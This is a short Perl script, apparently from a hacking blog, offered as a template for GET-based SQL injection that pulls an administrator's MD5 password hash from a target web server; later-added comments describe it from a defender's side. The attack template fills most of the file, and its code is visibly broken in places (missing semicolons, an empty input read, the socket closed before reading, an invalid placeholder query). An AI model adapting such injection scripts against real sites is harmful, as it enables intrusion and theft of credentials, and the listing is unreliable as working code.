#!/usr/bin/perl
# www.infodox.co.cc
# blog.infodox.co.cc
# http://twitter.com/info_dox
# Template for GET SQL injections that retrieve an admin MD5 hash.
#
# Overview of the script as written: it prompts for a host name, opens a
# TCP connection to port 80 on that host, and writes one hand-built
# HTTP/1.1 GET request whose target is $vuln with $sql appended. It then
# looks for a 32-character lowercase hex string in lines read from $sock.
#
# Defender view: the SQL text is concatenated into the query string with
# no encoding step, so it travels in the request line and is visible to
# web-server access logs and to any WAF/IDS that inspects URLs. The
# User-Agent is a configurable constant and is not a dependable indicator
# on its own. Server-side, binding the parameter through a parameterized
# query keeps a value like this from being parsed as SQL.
use IO::Socket
### CONFIG ###
$vuln="vuln.php?vuln="
# The page and query-string parameter that $sql is appended to.
$sql="DROP ALL WHERE 1=1"
# Placeholder SQL text; it becomes the value of the parameter above.
$useragent="FireFox blah blah blah"
# Value sent in the User-Agent request header.
### END OF CONFIG ###

# Ask the operator for the host to connect to.
# NOTE(review): the operand after `$host=` is missing on the page; it
# looks as if it was stripped as markup during extraction -- confirm
# against the original listing.
print "Insert the host to connect: ";
chomp ($host=);

# Plain TCP connection to port 80 (no TLS); dies with a message if the
# connection cannot be made.
$sock = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>"$host", PeerPort=>80) or die "[-] Connecting ... Can't connect to host.\n\n";

# Request target = page/parameter prefix followed directly by the SQL text.
$injection=$vuln.$sql

# Write the request by hand. $injection, $useragent and $host are
# interpolated verbatim into the request line and headers.
print $sock "GET $injection HTTP/1.1\n";
print $sock "Accept: */*n";
print $sock "User-Agent: $useragent\n";
print $sock "Host: $host\n";
print $sock "Connection: close\n\n";

close ($sock); # this line terminates the connection

# Scan lines read from $sock and report the first match, then exit.
# The pattern is unanchored and accepts any run of 32 characters from
# [0-9a-f] anywhere in a line; it does not establish that the value is an
# MD5 digest or a password hash, so other hex strings of that length or
# longer (tokens, ETags, asset fingerprints) match as well.
while($answer = <$sock>) {
    if ($answer =~ /([0-9a-f]{32})/) {
        print "[+] Found! The password hash is: $1\n";
        exit();
    }
# NOTE(review): the listing ends here; the closing brace of the while
# loop is not on the page.